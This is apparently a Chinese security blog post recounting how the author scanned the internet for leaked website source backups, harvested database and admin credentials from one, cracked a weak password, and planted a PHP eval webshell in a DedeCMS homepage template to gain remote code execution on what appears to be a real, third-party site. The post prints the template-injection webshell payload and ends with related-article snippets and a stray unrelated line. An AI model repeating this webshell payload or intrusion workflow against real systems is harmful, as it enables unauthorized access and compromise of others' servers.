<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次從源碼泄露到getshell

    Ann2021-12-27 07:14:24

    前言:

    此次滲透中的所有修改已經復原,且漏洞已經提交至cnvd平臺

    源碼泄露

    在一個月黑風高的夜晚,閑來無事的我又開著腳本利用hunter進行互聯網站點源碼的掃描

    在查看備份文件掃描結果時,看到了寶貝

    二話不說,訪問下載得到源碼!

    可以在注釋信息處發現dedecms的痕跡

    敏感信息泄露

    獲得源碼的第一步當然是獲取敏感信息

    先嘗試全局搜索(crtl+shift+f)關鍵詞

    key
    pwd
    passwd
    password
    

    1.數據庫信息泄露

    2.后臺管理員密碼泄露

    md5解密嘗試解密,居然是一個弱口令

    有了賬戶密碼后當然是要找到后臺管理地址,那么有了源碼后臺管理地址還不是手到擒來?

    后臺RCE->getshell

    源碼中找到后臺地址(居然改了個888)

    用泄露的admin/admin888進入后臺后,發現版本信息為dedecms PS1

    歷史漏洞

    既然已經獲得了cms信息,第一步當然看看他的歷史漏洞

    查找SP1歷史漏洞都是遠程代碼包含漏洞,但是這個站點已經將關鍵文件install.php刪除(源碼中不存在)

    抱著僥幸心里又去嘗試訪問l一下(說不定后來又加上了呢)確實不存在,只能繼續查看其他功能點

    然后也嘗試測試了許多SP2的漏洞payload但均失敗

    繼續測試其他點

    繼續查看發現系統設置->系統基本參數->其他選項中有模板引擎的禁用函數

    但是明明沒有模板引擎功能他為什么要禁用呢?

    我帶著這個疑問又重新翻看源碼

    果然又找到模板相關文件,(說明只是功能點被隱藏,文件依舊還在)

    嘗試訪問,成功訪問到并且能夠正常執行

    那么就好辦了,根據dedecms模板規則,后臺模板寫入payload,訪問即可執行PHP代碼

    {dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}
    //調用方式 [field:字段名/] 這里的關鍵是runphp='yes'
    //php代碼則是簡單的一句話
    

    然后去將其他選項中的禁用函數全部刪除保存

    因為注入到了index.htm

    所以連接webshell 的 url為首頁

    http://xxxxx:9890/index.php
    

    成功getshell

    本來還應該通過源碼泄露得到的數據庫賬戶密碼嘗試連接數據庫的,但這里刪shell跑路太急了就忘記了測了

    源碼php源碼
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    最近寫了點反序列化的題,才疏學淺,希望對CTF新手有所幫助,有啥錯誤還請大師傅們批評指正。php反序列化簡單理解首先我們需要理解什么是序列化,什么是反序列化?本質上反序列化是沒有危害的。但是如果用戶對數據可控那就可以利用反序列化構造payload攻擊。
    前言本文通過多個 poc ,結合ftp協議底層和php源碼,分析了在 php 中利用 ftp 偽協議攻擊 php-fpm ,從而繞過 disable_functions 的攻擊方法,并在文末復現了 [藍帽杯 2021]One Pointer PHP 和 [WMCTF2021] Make PHP Great Again And Again。
    在文章開頭部分,先對phar反序列化做一些小小的分析。
    這里根據紅日安全PHP-Audit-Labs對一些函數缺陷的分析,從PHP內核層面來分析一些函數的可利用的地方,標題所說的函數缺陷并不一定是函數本身的缺陷,也可能是函數在使用過程中存在某些問題,造成了漏洞,以下是對部分函數的分析
    前言:滲透測試的時候往往會遇到盲注這類的繁雜的手工測試,所以需要編寫半自動化腳本去進行測試減少時間浪費并快速
    審計test.php知,當參數$a不為空,且讀取的文件中包含’I want flag’時,即可顯示$flag。所以我們一般對其進行編碼,讓其不執行。從而導致 任意文件讀取。POC1直接讀取xxx.php文件,但大多數時候很多信息無法直接顯示在瀏覽器頁面上,所以需要采取POC2中方法將文件內容進行base64編碼后顯示在瀏覽器上,再自行解碼。
    前言本次審計的話是Seay+昆侖鏡進行漏洞掃描Seay的話它可以很方便的查看各個文件,而昆侖鏡可以很快且掃出更多的漏洞點,將這兩者進行結合起來,就可以發揮更好的效果。$sql = 'select * from xtcms_manager where m_name = "'.$a_name.'" and m_password = "'.md5.'"';驗證碼的校驗代碼if ($_SESSION['verifycode'] !該文件的含義是用0-9中的任意四個數字作為驗證碼,也就是說js引用該文件來產生驗證碼。wap/seacher.php昆侖鏡掃描利用seay查看源碼//這只是一部分,具體的師傅們可自行查看此文件
    鵬程杯wp
    2022-07-04 10:50:30
    鵬程杯wp
    某知名NAS存在敏感信息泄露漏洞CVE-2022-24***,組合其他漏洞,可實現未授權遠程命令執行。
    Laravel Framework 5.7.x版本中的Illuminate組件存在反序列化漏洞,遠程攻擊者可利用該漏洞執行代碼。
    Ann
    暫無描述
      亚洲 欧美 自拍 唯美 另类